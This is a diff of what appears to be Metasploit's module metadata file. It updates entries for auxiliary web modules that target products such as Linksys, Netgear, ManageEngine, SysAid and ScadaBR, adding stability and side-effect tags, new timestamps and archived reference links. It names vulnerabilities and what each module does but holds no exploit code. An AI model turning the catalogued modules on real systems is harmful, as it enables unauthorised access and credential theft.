"type": "auxiliary",
@@ -3213,7 +3248,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/joomla_registration_privesc",
@@ -3221,19 +3256,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/kaseya_master_admin": {
"name": "Kaseya VSA Master Administrator Account Creation",
"fullname": "auxiliary/admin/http/kaseya_master_admin",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-09-23",
"type": "auxiliary",
@@ -3266,7 +3305,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/kaseya_master_admin",
@@ -3274,19 +3313,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/katello_satellite_priv_esc": {
"name": "Katello (Red Hat Satellite) users/update_roles Missing Authorization",
"fullname": "auxiliary/admin/http/katello_satellite_priv_esc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-03-24",
"type": "auxiliary",
@@ -3318,7 +3361,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb",
"is_install_path": true,
"ref_name": "admin/http/katello_satellite_priv_esc",
@@ -3326,19 +3369,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/limesurvey_file_download": {
"name": "Limesurvey Unauthenticated File Download",
"fullname": "auxiliary/admin/http/limesurvey_file_download",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-10-12",
"type": "auxiliary",
@@ -3371,7 +3418,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/limesurvey_file_download",
@@ -3379,19 +3426,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/linksys_e1500_e2500_exec": {
"name": "Linksys E1500/E2500 Remote Command Execution",
"fullname": "auxiliary/admin/http/linksys_e1500_e2500_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-02-05",
"type": "auxiliary",
@@ -3424,7 +3474,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_e1500_e2500_exec",
@@ -3432,19 +3482,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/linksys_tmunblock_admin_reset_bof": {
"name": "Linksys WRT120N tmUnblock Stack Buffer Overflow",
"fullname": "auxiliary/admin/http/linksys_tmunblock_admin_reset_bof",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-02-19",
"type": "auxiliary",
@@ -3477,7 +3530,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_tmunblock_admin_reset_bof",
@@ -3485,19 +3538,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/linksys_wrt54gl_exec": {
"name": "Linksys WRT54GL Remote Command Execution",
"fullname": "auxiliary/admin/http/linksys_wrt54gl_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "auxiliary",
@@ -3531,7 +3588,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_wrt54gl_exec",
@@ -3539,19 +3596,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/manage_engine_dc_create_admin": {
"name": "ManageEngine Desktop Central Administrator Account Creation",
"fullname": "auxiliary/admin/http/manage_engine_dc_create_admin",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-12-31",
"type": "auxiliary",
@@ -3584,7 +3645,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-08 10:51:35 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/manage_engine_dc_create_admin",
@@ -3592,19 +3653,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/manageengine_dir_listing": {
"name": "ManageEngine Multiple Products Arbitrary Directory Listing",
"fullname": "auxiliary/admin/http/manageengine_dir_listing",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-01-28",
"type": "auxiliary",
@@ -3637,7 +3702,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_dir_listing",
@@ -3645,19 +3710,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/manageengine_file_download": {
"name": "ManageEngine Multiple Products Arbitrary File Download",
"fullname": "auxiliary/admin/http/manageengine_file_download",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-01-28",
"type": "auxiliary",
@@ -3690,7 +3758,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_file_download",
@@ -3698,19 +3766,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/manageengine_pmp_privesc": {
"name": "ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection",
"fullname": "auxiliary/admin/http/manageengine_pmp_privesc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-11-08",
"type": "auxiliary",
@@ -3743,7 +3814,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_pmp_privesc",
@@ -3751,19 +3822,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/mantisbt_password_reset": {
"name": "MantisBT password reset",
"fullname": "auxiliary/admin/http/mantisbt_password_reset",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-04-16",
"type": "auxiliary",
@@ -3797,7 +3872,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/mantisbt_password_reset",
@@ -3805,19 +3880,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/mutiny_frontend_read_delete": {
"name": "Mutiny 5 Arbitrary File Read and Delete",
"fullname": "auxiliary/admin/http/mutiny_frontend_read_delete",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-05-15",
"type": "auxiliary",
@@ -3828,7 +3907,7 @@
"references": [
"CVE-2013-0136",
"US-CERT-VU-701572",
- "URL-https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/"
+ "URL-http://web.archive.org/web/20250114041839/https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/"
],
"platform": "",
"arch": "",
@@ -3849,7 +3928,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
"is_install_path": true,
"ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -3857,6 +3936,13 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "os-resource-loss"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -3874,9 +3960,7 @@
"auxiliary_admin/http/netflow_file_download": {
"name": "ManageEngine NetFlow Analyzer Arbitrary File Download",
"fullname": "auxiliary/admin/http/netflow_file_download",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-11-30",
"type": "auxiliary",
@@ -3909,7 +3993,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/netflow_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/netflow_file_download",
@@ -3917,19 +4001,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/netgear_auth_download": {
"name": "NETGEAR ProSafe Network Management System 300 Authenticated File Download",
"fullname": "auxiliary/admin/http/netgear_auth_download",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2016-02-04",
"type": "auxiliary",
@@ -3962,7 +4049,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/netgear_auth_download.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_auth_download",
@@ -3970,19 +4057,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/netgear_pnpx_getsharefolderlist_auth_bypass": {
"name": "Netgear PNPX_GetShareFolderList Authentication Bypass",
"fullname": "auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2021-09-06",
"type": "auxiliary",
@@ -4038,16 +4128,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/netgear_r6700_pass_reset": {
"name": "Netgear R6700v3 Unauthenticated LAN Admin Password Reset",
"fullname": "auxiliary/admin/http/netgear_r6700_pass_reset",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-06-15",
"type": "auxiliary",
@@ -4098,25 +4184,19 @@
"Stability": [
"crash-service-down"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"RelatedModules": [
"exploit/linux/telnet/netgear_telnetenable"
]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/netgear_r7000_backup_cgi_heap_overflow_rce": {
"name": "Netgear R7000 backup.cgi Heap Overflow RCE",
"fullname": "auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2021-04-21",
"type": "auxiliary",
@@ -4169,16 +4249,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/netgear_soap_password_extractor": {
"name": "Netgear Unauthenticated SOAP Password Extractor",
"fullname": "auxiliary/admin/http/netgear_soap_password_extractor",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-02-11",
"type": "auxiliary",
@@ -4212,7 +4288,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_soap_password_extractor",
@@ -4220,19 +4296,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/netgear_wnr2000_pass_recovery": {
"name": "NETGEAR WNR2000v5 Administrator Password Recovery",
"fullname": "auxiliary/admin/http/netgear_wnr2000_pass_recovery",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2016-12-20",
"type": "auxiliary",
@@ -4266,7 +4345,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_wnr2000_pass_recovery",
@@ -4274,19 +4353,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/nexpose_xxe_file_read": {
"name": "Nexpose XXE Arbitrary File Read",
"fullname": "auxiliary/admin/http/nexpose_xxe_file_read",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -4297,7 +4379,7 @@
],
"description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to a craft special XML that\n could read arbitrary files from the filesystem. This module exploits the\n vulnerability via the XML API.",
"references": [
- "URL-https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/"
+ "URL-http://web.archive.org/web/20230402081629/https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/"
],
"platform": "",
"arch": "",
@@ -4318,7 +4400,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
"is_install_path": true,
"ref_name": "admin/http/nexpose_xxe_file_read",
@@ -4326,19 +4408,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/novell_file_reporter_filedelete": {
"name": "Novell File Reporter Agent Arbitrary File Delete",
"fullname": "auxiliary/admin/http/novell_file_reporter_filedelete",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -4371,7 +4456,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb",
"is_install_path": true,
"ref_name": "admin/http/novell_file_reporter_filedelete",
@@ -4379,19 +4464,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "os-resource-loss"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/nuuo_nvrmini_reset": {
"name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset",
"fullname": "auxiliary/admin/http/nuuo_nvrmini_reset",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2016-08-04",
"type": "auxiliary",
@@ -4424,7 +4512,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/nuuo_nvrmini_reset",
@@ -4432,19 +4520,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/openbravo_xxe": {
"name": "Openbravo ERP XXE Arbitrary File Read",
"fullname": "auxiliary/admin/http/openbravo_xxe",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-10-30",
"type": "auxiliary",
@@ -4477,7 +4569,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
"is_install_path": true,
"ref_name": "admin/http/openbravo_xxe",
@@ -4485,26 +4577,29 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/pfadmin_set_protected_alias": {
"name": "Postfixadmin Protected Alias Deletion Vulnerability",
"fullname": "auxiliary/admin/http/pfadmin_set_protected_alias",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-02-03",
"type": "auxiliary",
"author": [
"Jan-Frederik Rieckers"
],
- "description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias",
+ "description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias.",
"references": [
"CVE-2017-5930",
"URL-https://github.com/postfixadmin/postfixadmin/pull/23",
@@ -4529,7 +4624,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb",
"is_install_path": true,
"ref_name": "admin/http/pfadmin_set_protected_alias",
@@ -4537,19 +4632,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/pihole_domains_api_exec": {
"name": "Pi-Hole Top Domains API Authenticated Exec",
"fullname": "auxiliary/admin/http/pihole_domains_api_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2021-08-04",
"type": "auxiliary",
@@ -4592,9 +4691,7 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"ioc-in-logs",
"config-changes",
@@ -4603,16 +4700,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/rails_devise_pass_reset": {
"name": "Ruby on Rails Devise Authentication Password Reset",
"fullname": "auxiliary/admin/http/rails_devise_pass_reset",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-01-28",
"type": "auxiliary",
@@ -4649,7 +4742,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/rails_devise_pass_reset",
@@ -4657,19 +4750,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/scadabr_credential_dump": {
"name": "ScadaBR Credentials Dumper",
"fullname": "auxiliary/admin/http/scadabr_credential_dump",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-05-28",
"type": "auxiliary",
@@ -4677,9 +4774,7 @@
"bcoles "
],
"description": "This module retrieves credentials from ScadaBR, including\n service credentials and unsalted SHA1 password hashes for\n all users, by invoking the `EmportDwr.createExportData` DWR\n method of Mango M2M which is exposed to all authenticated\n users regardless of privilege level.\n\n This module has been tested successfully with ScadaBR\n versions 1.0 CE and 0.9 on Windows and Ubuntu systems.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 8080,
@@ -4699,7 +4794,7 @@
"https"
],
"targets": null,
- "mod_time": "2021-02-22 15:51:02 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb",
"is_install_path": true,
"ref_name": "admin/http/scadabr_credential_dump",
@@ -4707,19 +4802,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/scrutinizer_add_user": {
"name": "Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass",
"fullname": "auxiliary/admin/http/scrutinizer_add_user",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-07-27",
"type": "auxiliary",
@@ -4733,7 +4831,7 @@
"references": [
"CVE-2012-2626",
"OSVDB-84318",
- "URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
+ "URL-http://web.archive.org/web/20130827051639/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
],
"platform": "",
"arch": "",
@@ -4754,7 +4852,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb",
"is_install_path": true,
"ref_name": "admin/http/scrutinizer_add_user",
@@ -4762,19 +4860,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/sophos_wpa_traversal": {
"name": "Sophos Web Protection Appliance patience.cgi Directory Traversal",
"fullname": "auxiliary/admin/http/sophos_wpa_traversal",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-04-03",
"type": "auxiliary",
@@ -4810,7 +4912,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/sophos_wpa_traversal",
@@ -4818,19 +4920,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/supra_smart_cloud_tv_rfi": {
"name": "Supra Smart Cloud TV Remote File Inclusion",
"fullname": "auxiliary/admin/http/supra_smart_cloud_tv_rfi",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2019-06-03",
"type": "auxiliary",
@@ -4862,7 +4967,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb",
"is_install_path": true,
"ref_name": "admin/http/supra_smart_cloud_tv_rfi",
@@ -4870,19 +4975,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "service-resource-loss"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/sysaid_admin_acct": {
"name": "SysAid Help Desk Administrator Account Creation",
"fullname": "auxiliary/admin/http/sysaid_admin_acct",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
@@ -4914,7 +5023,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_admin_acct",
@@ -4922,19 +5031,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/sysaid_file_download": {
"name": "SysAid Help Desk Arbitrary File Download",
"fullname": "auxiliary/admin/http/sysaid_file_download",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
@@ -4967,7 +5080,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
